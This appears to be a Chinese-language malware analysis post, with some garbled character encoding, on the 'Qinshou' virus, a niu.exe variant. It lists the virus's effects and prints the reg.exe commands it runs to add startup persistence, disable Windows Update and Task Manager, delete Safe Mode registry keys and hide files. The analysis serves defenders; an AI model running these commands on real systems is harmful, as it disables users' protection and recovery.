最近有很多人中了這個(gè)“禽獸”病毒，之所以叫做“禽獸”病毒是因?yàn)椴《具\(yùn)行后，文件夾選項(xiàng)中隱藏文件的文字內(nèi)容被修改成了“禽獸尚且有半點(diǎn)憐憫之心，而我一點(diǎn)沒有，所以我不是禽獸。”

這個(gè)病毒其實(shí)就是原先分析的niu.exe的變種,不過(guò)此次變種變化巨大 增加了很多新的“功能”,中毒者在禽獸病毒和其他一些木馬的“幫助”下 系統(tǒng)將完全處于無(wú)保護(hù)的狀態(tài).在沒有任何工具的情況下 救活系統(tǒng)的可能性幾乎為0


　　此病毒的幾大罪狀如下：
　　1.破壞安全模式 禁用系統(tǒng)的一些自我保護(hù)功能（自動(dòng)更新，防火墻等）
　　2.IFEO映像劫持殺毒軟件以及常用安全工具
　　3.禁用任務(wù)管理器
　　4.修改主頁(yè)
　　5.關(guān)閉帶有“殺毒”等字樣的窗口
　　6.感染html等網(wǎng)頁(yè)文件
　　7.刪除gho文件，使用戶無(wú)法還原系統(tǒng)
　　8.U盤傳播
　　9.瘋狂下載多種木馬和流氓軟件（多達(dá)20多種木馬）


　　下面是病毒的具體分析

1.釋放如下文件：
%system32%\crsss.exe
在每個(gè)分區(qū)下面生成autorun.inf 和niu.exe
2.調(diào)用reg.exe進(jìn)行如下操作：

添加自身啟動(dòng)項(xiàng)目
ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D

禁用windows自動(dòng)更新
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f

禁用任務(wù)管理器
add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f

破壞顯示隱藏文件 并將選項(xiàng)名稱改為“禽獸尚且有半點(diǎn)憐憫之心,而我一點(diǎn)沒有,
所以我不是禽獸”
delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /f
add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v Text /t REG_SZ /d 禽獸尚且有半點(diǎn)憐憫之心,而我一點(diǎn)沒有,所以我不是禽獸. /f
破壞安全模式
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
3.向HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下面添加如下映像劫持項(xiàng)目指向%system32%\crsss.exe（篇幅所限，僅貼圖）

最新評(píng)論